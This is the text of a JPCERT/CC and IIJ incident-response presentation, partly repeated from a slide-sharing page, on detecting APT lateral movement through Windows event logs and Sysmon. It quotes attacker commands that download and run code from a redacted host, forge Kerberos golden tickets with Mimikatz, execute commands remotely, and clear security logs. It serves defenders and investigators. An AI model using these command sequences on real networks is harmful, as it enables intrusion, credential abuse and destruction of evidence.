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Pursue the Attackers
- Identify and Investigate Lateral
Movement Based on Behavior Pattern -
Shusei Tomonaga (JPCERT/CC)
Keisuke Muda (Internet Initiative Japan Inc.)
Copyright ©2017 JPCERT/CC All rights reserved.
Analysis Center at JPCERT/CC
Malware analysis, Forensics investigation.
Written up posts on malware analysis and
technical findings on this blog and Github.
Shusei Tomonaga
Copyright ©2017 JPCERT/CC All rights reserved.
Internet Initiative Japan Inc. (IIJ)
Analyst, Security Operation Center,
Security Business Department,
Advanced Security Division
As a member of IIJ SOC, primarily working on:
—Analysis of logs sent from customers’ networks
—Research/Analysis of software vulnerabilities
—Enhancement of IIJ SOC service and the service
Keisuke Muda
Copyright ©2017 JPCERT/CC All rights reserved.
Challenge of Incident Response
• Many hosts need to be investigated
for APT Incident Response
• Logs required for investigation are not
always recorded
• Difficult to detect Lateral Movement
Copyright ©2017 JPCERT/CC All rights reserved.
For lateral movement, a limited set of tools are
used in many different incidents.
There are some common patterns in the lateral
movement methods.
If you know what logs are recorded with the lateral
movement tools, IR will be easier.
Copyright ©2017 JPCERT/CC All rights reserved.
This Presentation Topics
1 Overview of APT Incident and
Lateral Movement
2 Tools Used by Attackers for
Lateral Movement
3 Tracing Attacks
4 Analysis of Tools Used by
Copyright ©2017 JPCERT/CC All rights reserved.6
1 Overview of APT Incident and
Lateral Movement
2 Tools Used by Attackers for
Lateral Movement
3 Tracing Attacks
4 Analysis of Tools Used by
Copyright ©2017 JPCERT/CC All rights reserved.7
File Server
Target Network
1. Infection
2. Initial
investigation 3. Internal reconnaissance
4. Spread of infection
5. Sending stolen data
Overview of APT Incident and Lateral Movement
6. Delete evidence
Copyright ©2017 JPCERT/CC All rights reserved.8
1 Overview of APT Incident and
Lateral Movement
2 Tools Used by Attackers for
Lateral Movement
3 Tracing Attacks
4 Analysis of Tools Used by
Copyright ©2017 JPCERT/CC All rights reserved.
Tools Used by Attackers at Lateral Movement
Why attackers use Windows commands and
legitimate tools?
They are not detected by antivirus software.
Attackers use not only attack tools
but also Windows commands and legitimate tools.
Copyright ©2017 JPCERT/CC All rights reserved.
Research of Tools Used by Attackers
Investigating C&C servers and malware connections
in five operations.
APT10 (named by FireEye)
APT17 (named by FireEye)
Dragon OK (named by Palo Alto)
Blue Termite (named by Kaspersky)
Tick (named by Symantec)
Research Methods
Copyright ©2017 JPCERT/CC All rights reserved.
Research Overview
C&C servers
Access Database
Copyright ©2017 JPCERT/CC All rights reserved.
Research Overview
C&C servers
Executed commands
Copyright ©2017 JPCERT/CC All rights reserved.13
Research Overview
Malware connection
Type Encode RC4 key
Daserf(Delphi) LZNT1 + RC4 + Custom Base64 Constant
(Depends on the malware)
DATPER(old) LZNT1 + RC4 + Custom Base64 Constant
(Depends on the malware)
lzrw1kh + xor + RC4 + Custom
(Depends on the malware)
xxmm LZNT1 + RC4 + Custom Base64
one-time key
Copyright ©2017 JPCERT/CC All rights reserved.
Data Set
Total command
execution: 16,866
Total number of
infected host: 645
Research Overview
Copyright ©2017 JPCERT/CC All rights reserved.
Data Set
Total command
execution: 16,866
Total number of
infected host: 645
Research Overview
Total Windows command execution: 14,268
Copyright ©2017 JPCERT/CC All rights reserved.
Lateral Movement: Initial Investigation
The most used command is tasklist.
If the infected host was a virtual machine for
analysis, the attacker will escape soon.
• Collect information of the infected host
Initial investigation
Copyright ©2017 JPCERT/CC All rights reserved.
Windows Command Used by Initial Investigation
Rank Command Count
1 tasklist 327
2 ver 182
3 ipconfig 145
4 net time 133
5 systeminfo 75
6 netstat 42
7 whoami 37
8 nbtstat 36
9 net start 35
10 set 29
11 qprocess 27
12 nslookup 11
Copyright ©2017 JPCERT/CC All rights reserved.
Lateral Movement: Internal Reconnaissance
• Look for information saved in the compromised
machine and information on the network
Internal Reconnaissance
The most used command is dir.
—The attacker look around confidential data
stored in the infected host.
For searching the local network, net is used.
Copyright ©2017 JPCERT/CC All rights reserved.
Windows Command Used for Internal Reconnaissance
Rank Command Count
1 dir 4466
2 ping 2372
3 net view 590
4 type 543
5 net use 541
6 echo 496
7 net user 442
8 net group 172
9 net localgroup 85
10 dsquery 81
11 net config 32
12 csvde 21
Copyright ©2017 JPCERT/CC All rights reserved.
net Command
net view
— Obtain a list of connectable domain resources
net user
— Manage local/domain accounts
net localgroup
— Obtain a list of users belonging to local groups
net group
— Obtain a list of users belonging to certain domain groups
net use
— Access to resources
Copyright ©2017 JPCERT/CC All rights reserved.21
Why ping command is often executed?
Searching network hosts using ping
> echo @echo off >ee.bat
> echo for /l %%i in (1,1,255) do ping -n 1
10.0.0.%%i ^|find "TTL=" ^>^>rr.txt >>ee.bat
> type ee.bat
> ee.bat
Copyright ©2017 JPCERT/CC All rights reserved.22
Why echo command is executed?
Create script file using the echo command
> echo $p = New-Object System.Net.WebClient >xz.ps1
> echo $p.DownloadFile("http://xxxxxxxxxx.com/wp/0122.
dat","c:intellogs0122.exe") >>xz.ps1
> type xz.ps1
> powershell -ExecutionPolicy ByPass -File C:intellogs
Copyright ©2017 JPCERT/CC All rights reserved.
Windows Command Used for Internal Reconnaissance
Rank Command Count
13 net share 19
14 quser 18
15 net session 17
16 query 12
17 tracert 9
18 cscript 9
19 nltest 5
20 dumpel 5
21 tree 3
22 LogParser 2
23 net accounts 2
24 route 1
Copyright ©2017 JPCERT/CC All rights reserved.24
Search Logon Event logs
dumpel command
LogParser command
> dumpel.exe -f ac1.dat -l security -s -d 10
> LogParser ""Select *From V:ServerSecurity.evtx Where
EventID=4624 AND TimeGenerated < '2017-04-28
23:59:59' AND TimeGenerated > '2017-04-28 00:00:00'""
-i:evt -o:csv > V:ServerSecurity.csv"
Copyright ©2017 JPCERT/CC All rights reserved.25
Search Logon Event logs
LogParser command 2
> LogParser -i:evt -o:csv select strings,timegenerated
from security where eventid=4624 and strings like ‘%min%'
and strings like '%winlogon.exe%' and (timegenerated
between TO_TIMESTAMP(‘2017-10-01’, 'yyyy-MM-dd’) and
TO_TIMESTAMP(‘2017-10-06', 'yyyy-MM-dd')) >c:
Copyright ©2017 JPCERT/CC All rights reserved.26
Search Logon Event logs
cscript command
> cscript eventquery.vbs /s /l application /fi "id eq
22 "
—Lists the events and event properties from one or
more event logs.
—Installed by default on Windows XP, Windows Server
2003. (Does not function on Windows 7 and later)
Copyright ©2017 JPCERT/CC All rights reserved.
Lateral Movement: Spread of Infection
• Infect the machine with other malware or
try to access other hosts
Spread of infection
The most used command is at.
—“at” command is not supported on Windows 10,
Windows 8.1 etc.
—If "at" doesn't exist, schtasks is used.
Password dump tool is always used.
Copyright ©2017 JPCERT/CC All rights reserved.
Windows Command Used for Spread of Infection
Rank Command Count
1 at 445
2 move 399
3 schtasks 379
4 copy 299
5 ren 151
6 reg 119
7 wmic 40
8 powershell 29
9 md 16
10 runas 7
11 sc 6
12 netsh 6
Copyright ©2017 JPCERT/CC All rights reserved.
Remote Command Execute Used Windows Command
at command
> at [IP Address] 12:00 cmd /c
schtasks command
> schtasks /create /tn [Task Name] /tr C:1.bat /sc
onstart /ru System /s [IP Address]
Copyright ©2017 JPCERT/CC All rights reserved.
Remote Command Execute Used Windows Command
wmic command
> wmic /node:[IP Address] /user:”[User Name]”
/password:”[PASSWORD]” process call create
“cmd /c c:WindowsSystem32net.exe user”
Copyright ©2017 JPCERT/CC All rights reserved.
The Managed Object Format (MOF) compiler parses a file
containing MOF statements and adds the classes and
class instances defined in the file to the WMI repository.
Compile the MOF File
mofcomp command
> move %temp%mseinst.mof serverC$WINDOWS
> mofcomp -N:rootdefault C:WINDOWSsystem32
wbemsvmon.mof >c:mofinst.txt
> mofcomp -AUTORECOVER C:WINDOWSsystem32
wbemsvmon.mof >>c:mofinst.txt
Copyright ©2017 JPCERT/CC All rights reserved.
Lateral Movement: Delete Evidence
• Delete files used by the attacker and logs
Delete evidence
The most used command is del.
For deleting the event log, wevtutil is used.
Copyright ©2017 JPCERT/CC All rights reserved.
Windows Command Used for Delete Evidence
Rank Command Count
1 del 844
2 taskkill 80
3 klist 73
4 wevtutil 23
5 rd 15
Copyright ©2017 JPCERT/CC All rights reserved.34
wevtutil command
Delete event logs
> wevtutil cl security
> wevtutil qe security /f:text /q:""*[System[EventID
=4624 or EventID=4769 or EventID=4672 or
EventID=4768]] and *[System[TimeCreated[@
Search logon event logs
Copyright ©2017 JPCERT/CC All rights reserved.35
wevtutil command
> wevtutil qe system /count:20 /rd:true /f:text /q:
""Event[System[(EventID=6005)]]"" |find ""Date"" >
Search start-up event logs
Copyright ©2017 JPCERT/CC All rights reserved.
An attacker uses Pass-the-ticket when spreading
infection to other hosts
—Pass-the-hash is rarely used
—Issues an unauthorized ticket that grants access
without additional authentication
—Golden ticket
Use TGT (Ticket-Granting Tickets)
—Silver ticket
Use ST (Service Ticket)
Delete Evidence of Pass-the-Ticket
Copyright ©2017 JPCERT/CC All rights reserved.37
Delete Evidence of Pass-the-Ticket
klist command
> klist purge
Copyright ©2017 JPCERT/CC All rights reserved.38
Example of Command Execution Flow
Example (Tick)
> cd intellogs
> whoami
> klist
> net use
> klist purge
> IntelGFX.exe "kerberos::golden /user:administrator /domain:[Domain]
/sid:[SID] /krbtgt:[RC4 Key] /group:502 /ticket:0422.tck" exit
> IntelGFX.exe "kerberos::ptt 0422.tck" exit
> ping -n 1
> ping -n 1
> net use
> dir$users
Golden Ticket with Mimikatz
Initial investigation
Internal reconnaissance
Copyright ©2017 JPCERT/CC All rights reserved.39
> copy bb.bat$windowssystem32
> net time
> at 12:27 bb.bat
> dir$windowssystem32inf.txt
> move$windowssystem32inf.txt .
> del$windowssystem32bb.bat
> copy zt.exe$windowssystem32mscfg.exe
> net time
> at 12:33 mscfg.exe
> dir$windowssystem32mscfg.exe
> del$windowssystem32inf.txt
> del$windowstasksat*.job
> net use /del
> dir
> del zt.exe inf.txt bb.bat
> dir
> net use
Spread of infection
Delete evidence
Copyright ©2017 JPCERT/CC All rights reserved.40
1 Overview of APT Incident and
Lateral Movement
2 Tools Used by Attackers for
Lateral Movement
3 Tracing Attacks
4 Analysis of Tools Used by
Copyright ©2017 JPCERT/CC All rights reserved.41
What Do We Want to Know About the Attacks…?
usedHosts Accounts/Privileges
being accessedFiles/Intelligences
Network traffics
attackers coming backPossibility of
Copyright ©2017 JPCERT/CC All rights reserved.42
What Do We Want to Know About the Attacks…?
usedHosts Accounts/Privileges
being accessedFiles/Intelligences
Network traffics
attackers coming backPossibility of
Find in Logon History
Find in Execution History
Find in Access and Execution Histories
Copyright ©2017 JPCERT/CC All rights reserved.
Following records are taken by default on Windows:
— Client OS
Successful/Failed Logon
Successful Logoff
Successful Policy Modification ... that’s about it
— Server OS
Successful Authentication in addition to the above
Some of the “Logon Histories” could be traced from the
default logs.
There may not be enough record to prove “Execution
History” and “Access History”.
What Do We Want vs. What Can Be Found
Copyright ©2017 JPCERT/CC All rights reserved.
Default configuration is not enough.
—Methods to cover the missing pieces are needed.
—There are not so many documents that summarize
methods and significant points for identifying threats.
Some of the entities are not recorded by default,
but it is possible to configure hosts to keep those
—We do need to think about which entities we should
cover to track the attacks.
Preparing For Investigation
Copyright ©2017 JPCERT/CC All rights reserved.
Tools and commands that were used in actual
attacks were analyzed.
—49 different tools that were frequently used in
attack behaviors were selected.
Approx. 1/3 were legitimate Windows tools.
—Each of them was tested on a virtual network,
and their execution “logs” were recorded.
Detecting Lateral Movement through Tracking Event Logs
Copyright ©2017 JPCERT/CC All rights reserved.
Tools and commands that were used in actual
attacks were analyzed.
—49 different tools that were frequently used in
attack behaviors were selected.
Approx. 1/3 were legitimate Windows tools.
—Each of them was tested on a virtual network,
and their execution “logs” were recorded.
In most cases, additional tweaks were
necessary to obtain enough records.
Detecting Lateral Movement through Tracking Event Logs
Copyright ©2017 JPCERT/CC All rights reserved.
Research report is
available on
JPCERT/CC website.
— https://www.jpcert.or.jp/english/
— English/Japanese
First published in 2016
Updated version 2017
available in Japanese
— English version
coming in December
Research Report
Copyright ©2017 JPCERT/CC All rights reserved.
The report shows some important aspects for tracing each tool.
Research Report
Report screenshot in Japanese; English version coming soon.
Copyright ©2017 JPCERT/CC All rights reserved.
Windows Event Logs
—Default and additional logs
Cache for performance improvements
File System Activities
File/Folder Access Histories
Network Traffic
Elements Researched
Copyright ©2017 JPCERT/CC All rights reserved.
Event Logs were the most useful among the
Research Results
Audit Policy Sysmon Application
Copyright ©2017 JPCERT/CC All rights reserved.
Event Logs were the most useful among the
There were some other useful information.
Research Results
Audit Policy Sysmon Application
Copyright ©2017 JPCERT/CC All rights reserved.
Event Logs were the most useful among the
There were some other useful information.
Research Results
Audit Policy Sysmon Application
This session
focuses here.
Copyright ©2017 JPCERT/CC All rights reserved.53
1 Overview of APT Incident and
Lateral Movement
2 Tools Used by Attackers for
Lateral Movement
3 Tracing Attacks
4 Analysis of Tools Used by
Copyright ©2017 JPCERT/CC All rights reserved.
Additional settings are needed to record tools
Additional settings makes difference in amount
of evidences that may be obtained.
—Without those additional settings, evidences
obtained from the compromised hosts may not
be enough.
Analysis of Tools Used by Attackers
Copyright ©2017 JPCERT/CC All rights reserved.
Is a PowerShell script published on GitHub.
Obtains plain text passwords stored on Group
Policy settings.
—Passwords can be stored when an update for
MS14-025 is not applied.
The following slides assume execution of the
PowerShell scripts.
Example: Get-GPPPassword.ps1
Copyright ©2017 JPCERT/CC All rights reserved.
An example case of attack procedures.
Tracing Execution Histories
Install remote access and/or other tools.
(Out of scope of this session)
Necessary information, such as AD domain names
and domain controller FQDN, are obtained.
1. Create an Access Path
2. Investigate the Network
3. Permit Script Execution
4. Download the Script
5. Execute the Script
6. Remove Evidences
Permit PowerShell script execution
(which is disabled by default).
Download the script to execute.
Execute the downloaded script.
Remove evidences of compromises.
Copyright ©2017 JPCERT/CC All rights reserved.57
What Do We Want to Know About the Attacks…?
usedHosts Accounts/Privileges
being accessedFiles/Intelligences
Network traffics
attackers coming backPossibility of
Find in Logon History
Find in Execution History
Find in Access and Execution Histories
Looks similar
to an ordinal
was used in
some ways,
but not sure
about what
Copyright ©2017 JPCERT/CC All rights reserved.
(Out of scope of this session)
Investigate compromised accounts and
executed commands using Audit Policies
1. Create an Access Path
2. Investigate the Network
3. Permit Script Execution
4. Download the Script
5. Execute the Script
6. Remove Evidences
Trace change on settings from PowerShell
execution and registry modification histories
Find script downloads from the network traffic
Trace execution history from PowerShell and
command execution histories
Prepare not to lose trace logs even when
attackers remove them from compromised hosts
Tracing Execution Histories
An example case of attack procedures.
Copyright ©2017 JPCERT/CC All rights reserved.
(Out of scope of this session)
Investigate compromised accounts and
executed commands using Audit Policies
1. Create an Access Path
2. Investigate the Network
3. Permit Script Execution
4. Download the Script
5. Execute the Script
6. Remove Evidences
Trace change on settings from PowerShell
execution and registry modification histories
Find script downloads from the network traffic
Trace execution history from PowerShell and
command execution histories
Prepare not to lose trace logs even when
attackers remove them from compromised hosts
Tracing Execution Histories
An example case of attack procedures.
Copyright ©2017 JPCERT/CC All rights reserved.
Options available on
Windows by default.
—One of the places to get
With default settings, not
many events are actually
—Resulting in lack of
evidences for tracing
the attacks.
Audit Policies
Copyright ©2017 JPCERT/CC All rights reserved.
A software that is a part of Windows Sysinternals.
— https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon
The software is publicly available on the webpage above.
Copyright ©2017 JPCERT/CC All rights reserved.
A software that is a part of Windows Sysinternals.
— https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon
The software is publicly available on the webpage above.
Information logged are shown below
(based on version 6.10, released on May 2017)
Process created
Change of file
creation time
Driver loaded
Image loaded
Thread created in
another process
Read disk using
“.” denotation
File creation
Registry events
File stream
Pipe events
WMI events
Copyright ©2017 JPCERT/CC All rights reserved.
If logs are preserved:
Evidences that cannot be recovered afterwards
are recorded.
If there is a case where the tool creates a temporary file:
Advantages of Log Analysis
The file may be removed from the
disk and cannot be recovered.
When searching on the disk...
“The file was created” in some
ways, but not sure about exactly
what was in the file
When running forensics...
Applications and
command lines
used for creating files
may be recovered.
From logs...
Copyright ©2017 JPCERT/CC All rights reserved.
Not a smart idea
— “We have no idea about which logs we should keep.
Simply just keep every single log”
If “take everything and filter out later” is the policy, it is okay to keep
By default, old logs are overwritten when
a log reaches its maximum size.
— Domain Controller: 128MB
— Others: 20MB
Important evidences might get buried without appropriate configurations.
— Logs for several weeks are stored without additional settings, but
does not contain enough evidences
— Logs may be overwritten within few hours with improperly configured
additional settings
Appropriate Configurations
Copyright ©2017 JPCERT/CC All rights reserved.
Events that were “useful”:
Useful Events (“Security” Events)
4611 4624 4648
4776 4778
4634 4779
Process Executed
Process Terminated
Filtering Platform
Account Management
4720 4722 4724
4726 4728 4737
4670 4904 4905
4946 4947
Policy Change
Use of Privileges
4672 4673 4674
4703 4768 4769
File Sharing
5140 5142
5144 5145
4656 4658 4659
4660 4661 4663
Copyright ©2017 JPCERT/CC All rights reserved.
The following events are recorded by default and were useful:
Useful Events (Windows Standard Events)
7036 7040 7045
102 103 105 216
300 302 2001
2003 2005 2006
Logs Cleared
Copyright ©2017 JPCERT/CC All rights reserved.
Events that were “useful”:
Useful Events (Sysmon Events)
Process Created
Use with “Security” audits
Process Terminated
Use with “Security” audits
File Creation
Time Changed
Network Connection
Use with “Security” audits
Process Accessed
Registry Events
12, 13
Copyright ©2017 JPCERT/CC All rights reserved.
Some properties might be common in both logs
—Sysmon logs tend to have more useful details.
—Some properties, such as “Token Elevation
Types” appears only on Audit logs.
Audit Policies and Sysmon (1)
Audit Sysmon
Copyright ©2017 JPCERT/CC All rights reserved.
(Out of scope of this session)
Investigate compromised accounts and
executed commands using Audit Policies
1. Create an Access Path
2. Investigate the Network
3. Permit Script Execution
4. Download the Script
5. Execute the Script
6. Remove Evidences
Trace change on settings from PowerShell
execution and registry modification histories
Find script downloads from the network traffic
Trace execution history from PowerShell and
command execution histories
Prepare not to lose trace logs even when
attackers remove them from compromised hosts
Tracing Execution Histories
An example case of attack procedures.
Done for
was used” in
some way
Copyright ©2017 JPCERT/CC All rights reserved.
By default, execution of PowerShell is logged,
but not sure about what has happened on the
PowerShell session.
PowerShell Logs
Copyright ©2017 JPCERT/CC All rights reserved.
With group policies, it is possible to configure
Windows to record PowerShell logs on:
—Windows 10, and
—Previous Windows versions with required
modules installed
PowerShell Logs
Copyright ©2017 JPCERT/CC All rights reserved.
The entire script will be recorded in Event Logs.
Command histories are saved in a separate file.
PowerShell Logs
Script Command History
Copyright ©2017 JPCERT/CC All rights reserved.
(Out of scope of this session)
Investigate compromised accounts and
executed commands using Audit Policies
1. Create an Access Path
2. Investigate the Network
3. Permit Script Execution
4. Download the Script
5. Execute the Script
6. Remove Evidences
Trace change on settings from PowerShell
execution and registry modification histories
Find script downloads from the network traffic
Trace execution history from PowerShell and
command execution histories
Prepare not to lose trace logs even when
attackers remove them from compromised hosts
Tracing Execution Histories
An example case of attack procedures.
Copyright ©2017 JPCERT/CC All rights reserved.
If there are network devices...
— Logs from firewalls, web proxies, IDS/IPS, and so on are useful.
Investigating Network Activities
Copyright ©2017 JPCERT/CC All rights reserved.
If there are network devices...
— Logs from firewalls, web proxies, IDS/IPS, and so on are useful.
If there are no network devices that can produce useful logs…
Investigating Network Activities
Sysmon Event 3
(“Network connection
Access to Shared
Folders (Logged on
the Domain Controller)
Windows Filtering
(Windows Firewall)
Copyright ©2017 JPCERT/CC All rights reserved.
Similar to process audits, network connections are logged in both
audit and Sysmon logs
Audit Policies and Sysmon (2)
Audit Sysmon
Copyright ©2017 JPCERT/CC All rights reserved.
History of file downloads may be found on:
—PowerShell commands
System.Net.WebClient.DownloadFile, etc…
Can be checked from PowerShell logs
—Files related to web browsers
Download history
Temporary Internet Files
File Downloads
It is possible to check them using Event Logs.
Copyright ©2017 JPCERT/CC All rights reserved.
(Out of scope of this session)
Investigate compromised accounts and
executed commands using Audit Policies
1. Create an Access Path
2. Investigate the Network
3. Permit Script Execution
4. Download the Script
5. Execute the Script
6. Remove Evidences
Trace change on settings from PowerShell
execution and registry modification histories
Find script downloads from the network traffic
Trace execution history from PowerShell and
command execution histories
Prepare not to lose trace logs even when
attackers remove them from compromised hosts
Tracing Execution Histories
An example case of attack procedures.
Copyright ©2017 JPCERT/CC All rights reserved.
File operations can be
traced from the Audit logs.
If the attacker creates a RAR or a ZIP file to
create a single file to upload obtained files to
his/her site...
—The archive file is created temporarily, and then
removed from the disk so it would not be found.
Tracking File Deletion
Copyright ©2017 JPCERT/CC All rights reserved.
Event Logs may be cleared
easily if the compromised
account has administrative rights.
If logs are logged on a file, simply removing the log
file will clear an evidence.
Clear Logs
Need to consider a case where
logs were cleared by attackers.
Copyright ©2017 JPCERT/CC All rights reserved.
Logs remaining on the hosts may be cleared
when an attacker successfully logs onto them.
Real-time log transfer to other hosts help
administrators to trace events even when the logs
were cleared from hosts locally.
—Event subscription
—Send using protocols such as Syslog
—Back up log files periodically
To Trace Attacks Even When Logs Were Cleared
Copyright ©2017 JPCERT/CC All rights reserved.
(Out of scope of this session)
Investigate compromised accounts and
executed commands using Audit Policies
1. Create an Access Path
2. Investigate the Network
3. Permit Script Execution
4. Download the Script
5. Execute the Script
6. Remove Evidences
Trace change on settings from PowerShell
execution and registry modification histories
Find script downloads from the network traffic
Trace execution history from PowerShell and
command execution histories
Prepare not to lose trace logs even when
attackers remove them from compromised hosts
Tracing Execution Histories
An example case of attack procedures.
Copyright ©2017 JPCERT/CC All rights reserved.
It is necessary to tune up log sizes appropriately.
—Otherwise, the precious evidences may get
buried with other “garbage”.
When attackers clear the logs stored on the
compromised hosts, it becomes difficult to trace
—It is important to think about gathering logs on
other hosts securely.
“Cons” of the Method
Copyright ©2017 JPCERT/CC All rights reserved.
Execution histories of tools may be traced.
—They cannot be traced by default settings.
—Some “valuable” logs are recorded by simply
modifying Windows settings and installing the
free software
“Pros” of the Method
Copyright ©2017 JPCERT/CC All rights reserved.
This research primarily used “Windows
standard features + Sysmon”.
Adding other elements would improve analysis.
—Monitoring networks
—Monitoring endpoints etc...
To Obtain Better Logs
Copyright ©2017 JPCERT/CC All rights reserved.
Typically, limited set of tools and commands are
used for Lateral Movement.
Many attack tools can be detected with audit
policy and Sysmon.
Our report would be helpful if you are
investigating APT incidents.
Copyright ©2017 JPCERT/CC All rights reserved.87
Thank you

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Pursue the Attackers – Identify and Investigate Lateral Movement Based on Behavior Pattern – by Shuhei Tomonaga, Keisuke-Muda

  • 1. Pursue the Attackers - Identify and Investigate Lateral Movement Based on Behavior Pattern - Shusei Tomonaga (JPCERT/CC) Keisuke Muda (Internet Initiative Japan Inc.)
  • 2. Copyright ©2017 JPCERT/CC All rights reserved. Self-introduction Analysis Center at JPCERT/CC Malware analysis, Forensics investigation. Written up posts on malware analysis and technical findings on this blog and Github. —http://blog.jpcert.or.jp/ —https://github.com/JPCERTCC/aa-tools 1 Shusei Tomonaga
  • 3. Copyright ©2017 JPCERT/CC All rights reserved. Self-introduction Internet Initiative Japan Inc. (IIJ) Analyst, Security Operation Center, Security Business Department, Advanced Security Division As a member of IIJ SOC, primarily working on: —Analysis of logs sent from customers’ networks —Research/Analysis of software vulnerabilities —Enhancement of IIJ SOC service and the service infrastructure 2 Keisuke Muda
  • 4. Copyright ©2017 JPCERT/CC All rights reserved. Challenge of Incident Response • Many hosts need to be investigated for APT Incident Response • Logs required for investigation are not always recorded • Difficult to detect Lateral Movement 3
  • 5. Copyright ©2017 JPCERT/CC All rights reserved. Approach For lateral movement, a limited set of tools are used in many different incidents. There are some common patterns in the lateral movement methods. 4 If you know what logs are recorded with the lateral movement tools, IR will be easier.
  • 6. Copyright ©2017 JPCERT/CC All rights reserved. This Presentation Topics 5 1 Overview of APT Incident and Lateral Movement 2 Tools Used by Attackers for Lateral Movement 3 Tracing Attacks 4 Analysis of Tools Used by Attackers
  • 7. Copyright ©2017 JPCERT/CC All rights reserved.6 1 Overview of APT Incident and Lateral Movement 2 Tools Used by Attackers for Lateral Movement 3 Tracing Attacks 4 Analysis of Tools Used by Attackers
  • 8. Copyright ©2017 JPCERT/CC All rights reserved.7 AD/ File Server Target Network 1. Infection 2. Initial investigation 3. Internal reconnaissance 4. Spread of infection 5. Sending stolen data Overview of APT Incident and Lateral Movement 6. Delete evidence
  • 9. Copyright ©2017 JPCERT/CC All rights reserved.8 1 Overview of APT Incident and Lateral Movement 2 Tools Used by Attackers for Lateral Movement 3 Tracing Attacks 4 Analysis of Tools Used by Attackers
  • 10. Copyright ©2017 JPCERT/CC All rights reserved. Tools Used by Attackers at Lateral Movement Why attackers use Windows commands and legitimate tools? They are not detected by antivirus software. 9 Attackers use not only attack tools but also Windows commands and legitimate tools.
  • 11. Copyright ©2017 JPCERT/CC All rights reserved. Research of Tools Used by Attackers Investigating C&C servers and malware connections in five operations. APT10 (named by FireEye) APT17 (named by FireEye) Dragon OK (named by Palo Alto) Blue Termite (named by Kaspersky) Tick (named by Symantec) 10 Research Methods
  • 12. Copyright ©2017 JPCERT/CC All rights reserved. Gstatus 11 Research Overview C&C servers Access Database
  • 13. Copyright ©2017 JPCERT/CC All rights reserved. Emdivi 12 Research Overview C&C servers SQLite Database Executed commands
  • 14. Copyright ©2017 JPCERT/CC All rights reserved.13 Research Overview Malware connection Type Encode RC4 key Daserf(Delphi) LZNT1 + RC4 + Custom Base64 Constant (Depends on the malware) DATPER(old) LZNT1 + RC4 + Custom Base64 Constant (Depends on the malware) DATPER(new) lzrw1kh + xor + RC4 + Custom Base64 Constant (Depends on the malware) xxmm LZNT1 + RC4 + Custom Base64 Fixed(“1234”) or one-time key
  • 15. Copyright ©2017 JPCERT/CC All rights reserved. Data Set Total command execution: 16,866 Total number of infected host: 645 14 Research Overview
  • 16. Copyright ©2017 JPCERT/CC All rights reserved. Data Set Total command execution: 16,866 Total number of infected host: 645 15 Research Overview Total Windows command execution: 14,268
  • 17. Copyright ©2017 JPCERT/CC All rights reserved. Lateral Movement: Initial Investigation The most used command is tasklist. If the infected host was a virtual machine for analysis, the attacker will escape soon. 16 • Collect information of the infected host Initial investigation
  • 18. Copyright ©2017 JPCERT/CC All rights reserved. Windows Command Used by Initial Investigation Rank Command Count 1 tasklist 327 2 ver 182 3 ipconfig 145 4 net time 133 5 systeminfo 75 6 netstat 42 7 whoami 37 8 nbtstat 36 9 net start 35 10 set 29 11 qprocess 27 12 nslookup 11 17
  • 19. Copyright ©2017 JPCERT/CC All rights reserved. Lateral Movement: Internal Reconnaissance • Look for information saved in the compromised machine and information on the network Internal Reconnaissance 18 The most used command is dir. —The attacker look around confidential data stored in the infected host. For searching the local network, net is used.
  • 20. Copyright ©2017 JPCERT/CC All rights reserved. Windows Command Used for Internal Reconnaissance Rank Command Count 1 dir 4466 2 ping 2372 3 net view 590 4 type 543 5 net use 541 6 echo 496 7 net user 442 8 net group 172 9 net localgroup 85 10 dsquery 81 11 net config 32 12 csvde 21 19
  • 21. Copyright ©2017 JPCERT/CC All rights reserved. net Command net view — Obtain a list of connectable domain resources net user — Manage local/domain accounts net localgroup — Obtain a list of users belonging to local groups net group — Obtain a list of users belonging to certain domain groups net use — Access to resources 20
  • 22. Copyright ©2017 JPCERT/CC All rights reserved.21 Why ping command is often executed? Searching network hosts using ping > echo @echo off >ee.bat > echo for /l %%i in (1,1,255) do ping -n 1 10.0.0.%%i ^|find "TTL=" ^>^>rr.txt >>ee.bat > type ee.bat > ee.bat
  • 23. Copyright ©2017 JPCERT/CC All rights reserved.22 Why echo command is executed? Create script file using the echo command > echo $p = New-Object System.Net.WebClient >xz.ps1 > echo $p.DownloadFile("http://xxxxxxxxxx.com/wp/0122. dat","c:intellogs0122.exe") >>xz.ps1 > type xz.ps1 > powershell -ExecutionPolicy ByPass -File C:intellogs xz.ps1
  • 24. Copyright ©2017 JPCERT/CC All rights reserved. Windows Command Used for Internal Reconnaissance Rank Command Count 13 net share 19 14 quser 18 15 net session 17 16 query 12 17 tracert 9 18 cscript 9 19 nltest 5 20 dumpel 5 21 tree 3 22 LogParser 2 23 net accounts 2 24 route 1 23
  • 25. Copyright ©2017 JPCERT/CC All rights reserved.24 Search Logon Event logs dumpel command LogParser command > dumpel.exe -f ac1.dat -l security -s -d 10 > LogParser ""Select *From V:ServerSecurity.evtx Where EventID=4624 AND TimeGenerated < '2017-04-28 23:59:59' AND TimeGenerated > '2017-04-28 00:00:00'"" -i:evt -o:csv > V:ServerSecurity.csv"
  • 26. Copyright ©2017 JPCERT/CC All rights reserved.25 Search Logon Event logs LogParser command 2 > LogParser -i:evt -o:csv select strings,timegenerated from security where eventid=4624 and strings like ‘%min%' and strings like '%winlogon.exe%' and (timegenerated between TO_TIMESTAMP(‘2017-10-01’, 'yyyy-MM-dd’) and TO_TIMESTAMP(‘2017-10-06', 'yyyy-MM-dd')) >c: windowstemplog.csv
  • 27. Copyright ©2017 JPCERT/CC All rights reserved.26 Search Logon Event logs cscript command > cscript eventquery.vbs /s /l application /fi "id eq 22 " eventquery.vbs —Lists the events and event properties from one or more event logs. —Installed by default on Windows XP, Windows Server 2003. (Does not function on Windows 7 and later)
  • 28. Copyright ©2017 JPCERT/CC All rights reserved. Lateral Movement: Spread of Infection • Infect the machine with other malware or try to access other hosts Spread of infection 27 The most used command is at. —“at” command is not supported on Windows 10, Windows 8.1 etc. —If "at" doesn't exist, schtasks is used. Password dump tool is always used.
  • 29. Copyright ©2017 JPCERT/CC All rights reserved. Windows Command Used for Spread of Infection 28 Rank Command Count 1 at 445 2 move 399 3 schtasks 379 4 copy 299 5 ren 151 6 reg 119 7 wmic 40 8 powershell 29 9 md 16 10 runas 7 11 sc 6 12 netsh 6
